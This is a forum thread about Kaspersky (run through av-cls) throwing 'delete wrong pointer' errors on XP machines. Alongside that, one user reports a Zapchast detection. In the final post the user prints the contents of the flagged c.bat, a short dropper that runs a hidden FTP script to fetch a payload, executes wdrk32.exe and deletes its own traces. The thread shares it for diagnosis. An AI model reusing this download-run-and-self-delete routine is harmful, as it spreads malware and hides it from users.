av-cls and Kaspersky - Error: delete wrong pointer <00000000>

[Duh_OZ]

Running Kaspersky VIA av-cls on two machines, both XP. Thousands of
"Error: delete wrong pointer <00000000>" messages during the scan
process. Is this SOP? Said error messages do now show up in the
log. On one machine (the other is still being scanned) 'K reported
it found a Zapchast in a file called c.bat The work machines use
Trend Micro so it may have been inactivated but not deleted by Trend,
or a false positive. I'll check the other machines.

 

[David H. Lipman]

From: "Duh_OZ" <[email protected]>

| Running Kaspersky VIA av-cls on two machines, both XP. Thousands of
| "Error: delete wrong pointer <00000000>" messages during the scan
| process. Is this SOP? Said error messages do now show up in the
| log. On one machine (the other is still being scanned) 'K reported
| it found a Zapchast in a file called c.bat The work machines use
| Trend Micro so it may have been inactivated but not deleted by Trend,
| or a false positive. I'll check the other machines.

Can you send me log extracts ?

 

[Duh_OZ]

From: "Duh_OZ" <[email protected]>

| Running Kaspersky VIA av-cls on two machines, both XP. Thousands of
| "Error: delete wrong pointer <00000000>" messages during the scan
| process. Is this SOP? Said error messages do now show up in the
| log. On one machine (the other is still being scanned) 'K reported
| it found a Zapchast in a file called c.bat The work machines use
| Trend Micro so it may have been inactivated but not deleted by Trend,
| or a false positive. I'll check the other machines.

Can you send me log extracts ?

========
Will do tomorrow when I return to work.

 

[mc]

I noticed the same thing this week scanning win98 se as it was scanning
thru the cab files...
mc

 

[Duh_OZ]

From: "Duh_OZ" <[email protected]>

| Running Kaspersky VIA av-cls on two machines, both XP. Thousands of
| "Error: delete wrong pointer <00000000>" messages during the scan
| process. Is this SOP? Said error messages do not show up in the
| log. On one machine (the other is still being scanned) 'K reported
| it found a Zapchast in a file called c.bat The work machines use
| Trend Micro so it may have been inactivated but not deleted by Trend,
| or a false positive. I'll check the other machines.

Can you send me log extracts ?

=========
Just sent the log file and a screen snapshot. You can run 'K over and
over on the files that have the 'wrong pointer' message and always get
it. Doesn't seem to harm anything.

 

[Duh_OZ]

Running Kaspersky VIAav-clson two machines, both XP. Thousands of
"Error: delete wrong pointer <00000000>" messages during the scan
process. Is this SOP? Said error messages do now show up in the
log. On one machine (the other is still being scanned) 'K reported
it found a Zapchast in a file called c.bat The work machines use
Trend Micro so it may have been inactivated but not deleted by Trend,
or a false positive. I'll check the other machines.

=========
As to the Zapchast(sp?) the c.bat file contained:
@echo off
ftp -n -v -s:.pif
wdrk32.exe
del .pif
del /F c.bat
exit /y

The file wdrk32.exe was 0 bytes on one computer and didn't exist on
the other. Creation date for the .bat was in 2005. Trend most
likely cleaned the payload file. It is also probable the malware
was taken care of before us workers got the computer. Three
computers, all arriving the same time and they're the only ones having
the c.bat on them. Who knows what big-bro does behind the scenes :0)